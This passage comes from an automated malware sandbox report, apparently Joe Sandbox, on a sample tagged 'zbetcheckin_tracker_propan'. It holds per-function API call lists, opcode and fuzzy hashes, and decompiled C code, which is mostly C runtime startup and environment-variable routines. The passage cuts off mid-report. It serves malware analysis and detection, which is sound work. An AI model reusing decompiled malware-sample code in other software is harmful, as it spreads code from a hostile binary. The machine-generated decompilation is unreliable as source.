        • Part of subcall function 002D258A: memcpy.NTDLL(00000000,?,?,?,?,80000003,?,002DC284,?,002DC0DC,?,80000003,?,00000000), ref: 002D25F0
        • Part of subcall function 002D258A: SafeArrayDestroy.OLEAUT32(?), ref: 002D260A
        • Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ArraySafememcpy$DestroyFreeStringlstrcpylstrlen$AllocCreateHeapmbstowcsmemset
      • String ID: \
      • API String ID: 1868127046-2967466578
      • Opcode ID: 0471f6dcec23b59a9582d22a67871e39bfe0c1744980941cfb9bc7049ae83c2f
      • Instruction ID: 8788443c3f8e8becd2cb33870c7bf33ffe475d2dfd16a7a1247ac17320b773ad
      • Opcode Fuzzy Hash: 0471f6dcec23b59a9582d22a67871e39bfe0c1744980941cfb9bc7049ae83c2f
      • Instruction Fuzzy Hash: E2419F72124346AFEB11EF61DC45E1BBBE8BF94341F00092AF59492661D730DD78AF62
      APIs
      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,002D4BE1,00000000,?,?,002D4EAA,00000001,002DB2D4), ref: 002D4A1F
      • RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4A37
      • memcpy.NTDLL(00000000,002DB2D4,-00000008,?,?,?,002D4BE1,00000000,?,?,002D4EAA,00000001,002DB2D4), ref: 002D4A7B
      • memcpy.NTDLL(00000001,002DB2D4,00000001,002D4EAA,00000001,002DB2D4), ref: 002D4A9C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: memcpy$AllocateHeaplstrlen
      • String ID: Fv
      • API String ID: 1819133394-1370784869
      • Opcode ID: d382686c2ae7b182508c3817d5d3fab4c6de9480125178897fd2171e342c5480
      • Instruction ID: c5a2fff97d5266f316acd6752a6968d7f47a7639629f1f69da8ad82fddf388a0
      • Opcode Fuzzy Hash: d382686c2ae7b182508c3817d5d3fab4c6de9480125178897fd2171e342c5480
      • Instruction Fuzzy Hash: 4E110672A10116AFD7109F69EC89E9EBBADEB80360B154177F80897250EA709E1487A0
      APIs
      • CompareStringW.KERNEL32(00000000,00000000,00418118,00000001,00418118,00000001), ref: 00410890
      • GetLastError.KERNEL32 ref: 004108A6
      • GetCPInfo.KERNEL32(?,?), ref: 00410973
      • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00410AFA
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2
      • CompareStringA.KERNEL32(?,?,?,000000FF,?,?), ref: 00410BB4
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CompareString$ErrorExceptionFilterInfoLastProcessUnhandled$ByteCharCurrentDebuggerFreeHeapLocaleMultiPresentTerminateWide
      • String ID:
      • API String ID: 1477149893-0
      • Opcode ID: 314d2e48f7f087af81bde016cf6e2330cc518261f67ab945c7a75e3da5c7bf92
      • Instruction ID: 7711d9c21cebea5d5858b18d19238fb1847bf70f07deecd0d53e6b420bb80e20
      • Opcode Fuzzy Hash: 314d2e48f7f087af81bde016cf6e2330cc518261f67ab945c7a75e3da5c7bf92
      • Instruction Fuzzy Hash: DEB1E571A042099FEF219FA4CC51BEF7BB5EF44354F24412BF811A6291D7B898D1CB98
      APIs
      • LCMapStringW.KERNEL32(00000000,00000100,00418118,00000001,00000000,00000000,00000100,?,00000000,00412F26,?,?,?,?,?,?), ref: 00412B83
      • GetLastError.KERNEL32 ref: 00412B95
      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00412D46
      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00412D69
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2
      • LCMapStringA.KERNEL32(?,?,?,00412F26,00000000,?,00000100,?,00000000,00412F26,?,?,?,?,?,?), ref: 00412EB8
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: String$ByteCharErrorExceptionFilterLastMultiProcessUnhandledWide$CurrentDebuggerFreeHeapInfoLocalePresentTerminate
      • String ID:
      • API String ID: 1670007227-0
      • Opcode ID: 6069162c02378e2361d982123326a565ed05b882d1485d9949e7bd7758d57ae5
      • Instruction ID: add9e604773e98e0779d4ea288a642ae63b3a42f9b82ecacdf1b385bd7247509
      • Opcode Fuzzy Hash: 6069162c02378e2361d982123326a565ed05b882d1485d9949e7bd7758d57ae5
      • Instruction Fuzzy Hash: 77B17D7290010AAFCF219F94DE808EF7BB5FB08354B14452BF905E2260D7798DA1DBA9
      APIs
      • GetStartupInfoA.KERNEL32(?), ref: 0040F5DD
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE
      • GetFileType.KERNEL32(00000028), ref: 0040F6F3
      • GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
      • GetFileType.KERNEL32(00000000), ref: 0040F78F
        • Part of subcall function 00411650: GetModuleHandleA.KERNELBASE(00418144), ref: 00411699
        • Part of subcall function 00411650: GetProcAddress.KERNELBASE(00000000,0041811C), ref: 004116A9
      • SetHandleCount.KERNEL32 ref: 0040F7E7
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Handle$FileType$AddressCountInfoModuleProcSleepStartup
      • String ID:
      • API String ID: 3773779220-0
      • Opcode ID: f54464cf799bca3e3ff0fd6964fde78cc66049f9b524298c330f57b1c1d656b0
      • Instruction ID: 9832171e80a5ad363fa20e46c0fd29f7966222acd706654d32d6996e2c1b38b7
      • Opcode Fuzzy Hash: f54464cf799bca3e3ff0fd6964fde78cc66049f9b524298c330f57b1c1d656b0
      • Instruction Fuzzy Hash: 396105715047418ECB308B38DD44B56BBA0AB06324F29877BD462BBBE1D778D84A971A
      C-Code - Quality: 83%
      			E0040F5C8(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t61;
      				void* _t64;
      				long _t68;
      				signed int _t71;
      				signed int _t72;
      				int* _t74;
      				signed int* _t77;
      				signed char _t79;
      				long _t86;
      				signed int _t88;
      				int* _t89;
      				signed int _t92;
      				signed int _t93;
      				void* _t98;
      				signed int** _t101;
      				signed int _t102;
      				void* _t106;
      				int _t107;
      				int _t109;
      				void** _t112;
      				signed int _t114;
      				void** _t118;
      				void* _t119;
      				void* _t126;
      
      				_t102 = __edx;
      				_push(0x54);
      				_push(0x418c98);
      				E0040D48C(__ebx, __edi, __esi);
      				 *(_t119 - 4) = 0;
      				GetStartupInfoA(_t119 - 0x64);
      				 *(_t119 - 4) = 0xfffffffe;
      				_push(0x28);
      				_t109 = 0x20;
      				_push(_t109);
      				_t61 = E004110D9();
      				if(_t61 == 0) {
      					L45:
      					_t62 = _t61 | 0xffffffff;
      					__eflags = _t61 | 0xffffffff;
      					L46:
      					return E0040D4D1(_t62);
      				}
      				 *0x436ae0 = _t61;
      				 *0x436ad4 = _t109;
      				_t4 = _t61 + 0x500; // 0x500
      				_t92 = _t4;
      				while(_t61 < _t92) {
      					 *((char*)(_t61 + 4)) = 0;
      					 *_t61 =  *_t61 | 0xffffffff;
      					 *((char*)(_t61 + 5)) = 0xa;
      					 *((intOrPtr*)(_t61 + 8)) = 0;
      					 *((char*)(_t61 + 0x24)) = 0;
      					 *((char*)(_t61 + 0x25)) = 0xa;
      					 *((char*)(_t61 + 0x26)) = 0xa;
      					_t61 = _t61 + 0x28;
      					_t93 =  *0x436ae0; // 0x1d309f0
      					_t92 = _t93 + 0x500;
      					__eflags = _t92;
      				}
      				if( *((intOrPtr*)(_t119 - 0x32)) == 0) {
      					L26:
      					_t88 = 0;
      					do {
      						_t112 = _t88 * 0x28 +  *0x436ae0;
      						_t64 =  *_t112;
      						if(_t64 == 0xffffffff || _t64 == 0xfffffffe) {
      							_t112[1] = 0x81;
      							__eflags = _t88;
      							if(_t88 != 0) {
      								asm("sbb eax, eax");
      								_t68 =  ~(_t88 - 1) + 0xfffffff5;
      								__eflags = _t68;
      							} else {
      								_t68 = 0xfffffff6;
      							}
      							_t106 = GetStdHandle(_t68);
      							__eflags = _t106 - 0xffffffff;
      							if(_t106 == 0xffffffff) {
      								L42:
      								_t57 =  &(_t112[1]);
      								 *_t57 = _t112[1] | 0x00000040;
      								__eflags =  *_t57;
      								 *_t112 = 0xfffffffe;
      								goto L43;
      							} else {
      								__eflags = _t106;
      								if(_t106 == 0) {
      									goto L42;
      								}
      								_t71 = GetFileType(_t106);
      								__eflags = _t71;
      								if(_t71 == 0) {
      									goto L42;
      								}
      								 *_t112 = _t106;
      								_t72 = _t71 & 0x000000ff;
      								__eflags = _t72 - 2;
      								if(__eflags != 0) {
      									__eflags = _t72 - 3;
      									if(__eflags == 0) {
      										_t52 =  &(_t112[1]);
      										 *_t52 = _t112[1] | 0x00000008;
      										__eflags =  *_t52;
      									}
      								} else {
      									_t112[1] = _t112[1] | 0x00000040;
      								}
      								_push(0xfa0);
      								_t54 =  &(_t112[3]); // -4418260
      								_t61 = E00411650(_t88, _t102, _t106, _t112, __eflags);
      								__eflags = _t61;
      								if(_t61 == 0) {
      									goto L45;
      								} else {
      									_t112[2] = _t112[2] + 1;
      									goto L43;
      								}
      							}
      						} else {
      							_t112[1] = _t112[1] | 0x00000080;
      						}
      						L43:
      						_t88 = _t88 + 1;
      					} while (_t88 < 3);
      					SetHandleCount( *0x436ad4);
      					_t62 = 0;
      					goto L46;
      				}
      				_t74 =  *(_t119 - 0x30);
      				if(_t74 == 0) {
      					goto L26;
      				}
      				_t107 =  *_t74;
      				_t89 =  &(_t74[1]);
      				 *(_t119 - 0x1c) = _t89 + _t107;
      				if(_t107 >= 0x800) {
      					_t107 = 0x800;
      				}
      				_t114 = 1;
      				while(1) {
      					_t126 =  *0x436ad4 - _t107; // 0x20
      					if(_t126 >= 0) {
      						break;
      					}
      					_t77 = E004110D9(0x20, 0x28);
      					__eflags = _t77;
      					if(__eflags == 0) {
      						_t107 =  *0x436ad4; // 0x20
      						L17:
      						 *(_t119 - 0x20) =  *(_t119 - 0x20) & 0x00000000;
      						if(_t107 <= 0) {
      							goto L26;
      						} else {
      							goto L18;
      						}
      						do {
      							L18:
      							_t98 =  *( *(_t119 - 0x1c));
      							if(_t98 != 0xffffffff && _t98 != 0xfffffffe) {
      								_t79 =  *_t89;
      								if((_t79 & 0x00000001) == 0) {
      									goto L25;
      								}
      								if((_t79 & 0x00000008) != 0) {
      									L23:
      									_t118 = ( *(_t119 - 0x20) & 0x0000001f) * 0x28 + 0x436ae0[ *(_t119 - 0x20) >> 5];
      									 *_t118 =  *( *(_t119 - 0x1c));
      									_t118[1] =  *_t89;
      									_push(0xfa0);
      									_t39 =  &(_t118[3]); // 0xc
      									_t61 = E00411650(_t89, _t102, _t107, _t118, _t132);
      									if(_t61 == 0) {
      										goto L45;
      									}
      									_t118[2] = _t118[2] + 1;
      									goto L25;
      								}
      								_t86 = GetFileType(_t98);
      								_t132 = _t86;
      								if(_t86 == 0) {
      									goto L25;
      								}
      								goto L23;
      							}
      							L25:
      							 *(_t119 - 0x20) =  *(_t119 - 0x20) + 1;
      							_t89 =  &(_t89[0]);
      							 *(_t119 - 0x1c) =  &(( *(_t119 - 0x1c))[1]);
      						} while ( *(_t119 - 0x20) < _t107);
      						goto L26;
      					}
      					_t101 =  &(0x436ae0[_t114]);
      					 *_t101 = _t77;
      					 *0x436ad4 =  *0x436ad4 + 0x20;
      					_t18 =  &(_t77[0x140]); // 0x500
      					_t102 = _t18;
      					while(1) {
      						__eflags = _t77 - _t102;
      						if(_t77 >= _t102) {
      							break;
      						}
      						_t77[1] = 0;
      						 *_t77 =  *_t77 | 0xffffffff;
      						_t77[1] = 0xa;
      						_t77[2] = _t77[2] & 0x00000000;
      						_t77[9] = _t77[9] & 0x00000080;
      						_t77[9] = 0xa;
      						_t77[9] = 0xa;
      						_t77 =  &(_t77[0xa]);
      						_t102 =  &(( *_t101)[0x140]);
      						__eflags = _t102;
      					}
      					_t114 = _t114 + 1;
      					__eflags = _t114;
      				}
      				goto L17;
      			}

      APIs
      • GetStartupInfoA.KERNEL32 ref: 0040F5DD
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
      • GetFileType.KERNEL32(00000028), ref: 0040F6F3
      • GetStdHandle.KERNEL32(-000000F6), ref: 0040F77D
      • GetFileType.KERNEL32(00000000), ref: 0040F78F
        • Part of subcall function 00411650: GetModuleHandleA.KERNELBASE(kernel32.dll,00000014,0040D3F9,00000000,00000FA0,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 00411699
        • Part of subcall function 00411650: GetProcAddress.KERNELBASE(00000000,InitializeCriticalSectionAndSpinCount,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000), ref: 004116A9
      • SetHandleCount.KERNEL32 ref: 0040F7E7
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Handle$FileType$AddressCountInfoModuleProcSleepStartup
      • String ID:
      • API String ID: 3773779220-0
      • Opcode ID: 177b95c54f012ced1cbbbfd99870b4da6430cddf8e0b3fa422239073d3d5df6b
      • Instruction ID: 9832171e80a5ad363fa20e46c0fd29f7966222acd706654d32d6996e2c1b38b7
      • Opcode Fuzzy Hash: 177b95c54f012ced1cbbbfd99870b4da6430cddf8e0b3fa422239073d3d5df6b
      • Instruction Fuzzy Hash: 396105715047418ECB308B38DD44B56BBA0AB06324F29877BD462BBBE1D778D84A971A
      APIs
      • GetLastError.KERNEL32 ref: 0040F4C3
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93
      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040F55F
      • GetEnvironmentStrings.KERNEL32 ref: 0040F571
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000), ref: 004110B6
      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5A2
      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040F5B9
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: EnvironmentFreeStrings$ErrorLast$HeapSleep
      • String ID:
      • API String ID: 2723279459-0
      • Opcode ID: 66e5e16bbc2dae928d6d27937c6462e8127e4b768cd69cb8ae85eedee65fc7fc
      • Instruction ID: 6bf94f53e6792b39615ea347a74f884125bffed823015082882c4e2888071e4e
      • Opcode Fuzzy Hash: 66e5e16bbc2dae928d6d27937c6462e8127e4b768cd69cb8ae85eedee65fc7fc
      • Instruction Fuzzy Hash: 803116B25042257FC7303F745C8483B7AECEB58354725093BFA45E3B82E6395C8D86A9
      APIs
      • lstrcpyn.KERNEL32(?,004040F4,00000008), ref: 002DE64F
      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 002DE6C2
      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000001), ref: 002DE724
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AllocFreelstrcpyn
      • String ID: Sep 26 2018$pnls
      • API String ID: 2525242972-743851359
      • Opcode ID: 4c9f1391c27781ae0e8a1fdc3f2a701da6ce61fa81748751bd6d1aad50f98a9c
      • Instruction ID: e8dd02b51cd0e676c304544d8130cbdc5c4daf04c04c18ff8e5a331340c2de1b
      • Opcode Fuzzy Hash: 4c9f1391c27781ae0e8a1fdc3f2a701da6ce61fa81748751bd6d1aad50f98a9c
      • Instruction Fuzzy Hash: 1731A071A102059BDF44EF94C984BAEB775BF44304F1A806AEA017F381D7B0ED55CB94
      APIs
      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002D1061,?), ref: 002D39B3
      • GetVersion.KERNEL32 ref: 002D39C2
      • GetCurrentProcessId.KERNEL32 ref: 002D39D9
      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002D39F6
      • GetLastError.KERNEL32 ref: 002D3A15
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
      • String ID:
      • API String ID: 2270775618-0
      • Opcode ID: 3110d759c24c1e354c9ac6c8a56019d113d78968d025c03d13d87349711af43f
      • Instruction ID: d70886962790085759442398c4f68ff4742fd1e3883705a2046b2f3d73eda4fd
      • Opcode Fuzzy Hash: 3110d759c24c1e354c9ac6c8a56019d113d78968d025c03d13d87349711af43f
      • Instruction Fuzzy Hash: DDF06271FA2301DAD721CF24FD2DB193B64A704782F21851BE996DA2F0D7B04E508B17
      C-Code - Quality: 49%
      			E00410E52(CHAR* __edx, CHAR** _a4, CHAR* _a8) {
      				CHAR* _v8;
      				signed int _v12;
      				CHAR* _v16;
      				signed int _v20;
      				CHAR* _v24;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				CHAR** _t42;
      				CHAR* _t43;
      				CHAR* _t44;
      				CHAR* _t45;
      				void* _t54;
      				char* _t60;
      				char* _t71;
      				intOrPtr* _t81;
      				intOrPtr _t87;
      				void* _t97;
      				CHAR* _t100;
      				CHAR* _t103;
      				CHAR* _t105;
      				void* _t106;
      
      				_t96 = __edx;
      				_t42 = _a4;
      				_t110 = _t42;
      				_v20 = 0;
      				if(_t42 != 0) {
      					_t103 =  *_t42;
      					__eflags = _t103;
      					_v8 = _t103;
      					if(__eflags == 0) {
      						L11:
      						_t43 = E0040D198(__eflags);
      						 *_t43 = 0x16;
      						L12:
      						_t44 = _t43 | 0xffffffff;
      						__eflags = _t44;
      						L13:
      						return _t44;
      					}
      					_t45 = E004138D6(_t103, 0x3d);
      					__eflags = _t45;
      					_v16 = _t45;
      					if(__eflags == 0) {
      						goto L11;
      					}
      					__eflags = _t103 - _t45;
      					if(__eflags == 0) {
      						goto L11;
      					}
      					__eflags = _t45[1];
      					_t43 =  *0x43609c; // 0x1d31728
      					__eflags = _t43 -  *0x4360a0; // 0x0
      					_v12 = 0 | __eflags == 0x00000000;
      					if(__eflags == 0) {
      						_t43 = E00410DF5(__edx, _t43);
      						 *0x43609c = _t43;
      					}
      					__eflags = _t43;
      					if(_t43 != 0) {
      						L20:
      						_t105 =  *0x43609c; // 0x1d31728
      						__eflags = _t105;
      						_v24 = _t105;
      						if(_t105 == 0) {
      							goto L12;
      						}
      						_t100 = E00410DA8(_v16 - _v8, _v8);
      						__eflags = _t100;
      						if(_t100 < 0) {
      							L30:
      							__eflags = _v12;
      							if(__eflags != 0) {
      								_push(_v8);
      								E00410D1A(0, _t100, _t105, __eflags);
      								 *_a4 = 0;
      								goto L49;
      							}
      							__eflags = _t100;
      							if(_t100 < 0) {
      								_t100 =  ~_t100;
      							}
      							_t25 =  &(_t100[2]); // 0x2
      							_t43 = _t25;
      							__eflags = _t43 - _t100;
      							if(_t43 < _t100) {
      								goto L12;
      							} else {
      								__eflags = _t43 - 0x3fffffff;
      								if(_t43 >= 0x3fffffff) {
      									goto L12;
      								}
      								_t43 = E0041116C( *0x43609c, 4, _t43);
      								_t106 = _t106 + 0xc;
      								__eflags = _t43;
      								if(_t43 == 0) {
      									goto L12;
      								}
      								_t96 = _v8;
      								_t81 = _t43 + _t100 * 4;
      								 *_t81 = _v8;
      								 *((intOrPtr*)(_t81 + 4)) = 0;
      								 *_a4 = 0;
      								L37:
      								 *0x43609c = _t43;
      								L38:
      								__eflags = _a8;
      								if(_a8 != 0) {
      									_t105 = _v8;
      									_t100 = E004110D9(E0040CCD0(_t105) + 2, 1);
      									__eflags = _t100;
      									if(_t100 != 0) {
      										_t54 = E0040CCD0(_t105);
      										_t87 = _t105;
      										_push(_t54 + 2);
      										_push(_t100);
      										__eflags = E0040D0F8(_t96);
      										if(__eflags != 0) {
      											_push(0);
      											_push(0);
      											_push(0);
      											_push(0);
      											_push(0);
      											E0040CA26(0, _t87, _t96, _t100, __eflags);
      										}
      										_t60 = _t100 - _t105 + _v16;
      										 *_t60 = 0;
      										asm("sbb ecx, ecx");
      										__eflags = SetEnvironmentVariableA(_t100,  !( ~_v12) & _t60 + 0x00000001);
      										if(__eflags == 0) {
      											_t35 =  &_v20;
      											 *_t35 = _v20 | 0xffffffff;
      											__eflags =  *_t35;
      											 *((intOrPtr*)(E0040D198(__eflags))) = 0x2a;
      										}
      										_push(_t100);
      										E00410D1A(0, _t100, _t105, __eflags);
      									}
      								}
      								__eflags = _v12;
      								if(__eflags != 0) {
      									_push(_v8);
      									E00410D1A(0, _t100, _t105, __eflags);
      								}
      								_t44 = _v20;
      								goto L13;
      							}
      						}
      						__eflags =  *_t105;
      						if(__eflags == 0) {
      							goto L30;
      						}
      						_t105 = _t105 + _t100 * 4;
      						_push( *_t105);
      						E00410D1A(0, _t100, _t105, __eflags);
      						__eflags = _v12;
      						if(_v12 != 0) {
      							while(1) {
      								__eflags =  *_t105;
      								if( *_t105 == 0) {
      									break;
      								}
      								 *_t105 = _t105[4];
      								_t100 =  &(_t100[1]);
      								__eflags = _t100;
      								_t105 = _v24 + _t100 * 4;
      							}
      							__eflags = _t100 - 0x3fffffff;
      							if(_t100 >= 0x3fffffff) {
      								goto L38;
      							}
      							_t43 = E0041116C( *0x43609c, _t100, 4);
      							_t106 = _t106 + 0xc;
      							__eflags = _t43;
      							if(_t43 == 0) {
      								goto L38;
      							}
      							goto L37;
      						}
      						 *_t105 = _v8;
      						 *_a4 = 0;
      						goto L38;
      					} else {
      						__eflags = _a8;
      						if(_a8 == 0) {
      							L15:
      							__eflags = _v12;
      							if(_v12 != 0) {
      								L49:
      								_t44 = 0;
      								goto L13;
      							}
      							_t43 = E00411099(4);
      							__eflags = _t43;
      							 *0x43609c = _t43;
      							if(_t43 == 0) {
      								goto L12;
      							}
      							 *_t43 = 0;
      							__eflags =  *0x4360a4; // 0x0
      							if(__eflags != 0) {
      								goto L20;
      							}
      							_t43 = E00411099(4);
      							__eflags = _t43;
      							 *0x4360a4 = _t43;
      							if(_t43 == 0) {
      								goto L12;
      							}
      							 *_t43 = 0;
      							goto L20;
      						}
      						__eflags =  *0x4360a4; // 0x0
      						if(__eflags == 0) {
      							goto L15;
      						}
      						_t43 = E0040CD5B(_t96);
      						__eflags = _t43;
      						if(__eflags == 0) {
      							goto L20;
      						}
      						goto L11;
      					}
      				}
      				_t71 = E0040D198(_t110);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				_push(0);
      				 *_t71 = 0x16;
      				return E0040CB22(0, __edx, _t97) | 0xffffffff;
      			}

      APIs
        • Part of subcall function 0040CD5B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00007FFF,01D31728,?,00000007,00000007,?,0040C52B,00007FFF), ref: 0040CD83
        • Part of subcall function 0040CD5B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,J-@HrA,00000000,00000000,?,00000007,00000007,?,0040C52B,00007FFF,?,00000000), ref: 0040CDA9
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6
      • _strlen.LIBCMT ref: 00410FFC
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE
      • _strlen.LIBCMT ref: 00411014
      • SetEnvironmentVariableA.KERNEL32(00000000,00402D4A,?,?,?,?,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 0041104E
        • Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
        • Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
        • Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
        • Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
        • Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06
        • Part of subcall function 0041116C: Sleep.KERNEL32(00000000,00000000,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 00411199
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Sleep$ByteCharExceptionFilterMultiProcessUnhandledWide_strlen$CurrentDebuggerEnvironmentErrorFreeHeapLastPresentTerminateVariable
      • String ID: J-@HrA
      • API String ID: 1585012247-3743386923
      • Opcode ID: 41ee8227dce6281a19a73b75075688b85e0f97ba5bb2c9ce6b6d11813acd3e92
      • Instruction ID: 335b78c267723d3b526c91eb43645e15cd01a0fbd303deb746c6d6396b4c9f8e
      • Opcode Fuzzy Hash: 41ee8227dce6281a19a73b75075688b85e0f97ba5bb2c9ce6b6d11813acd3e92
      • Instruction Fuzzy Hash: 9461A671A00206EFCF24DF65D8825EE7BB1EB05318B25453FE605E7290DBB999C1CB19
      C-Code - Quality: 100%
      			E0040CE14(intOrPtr _a4) {
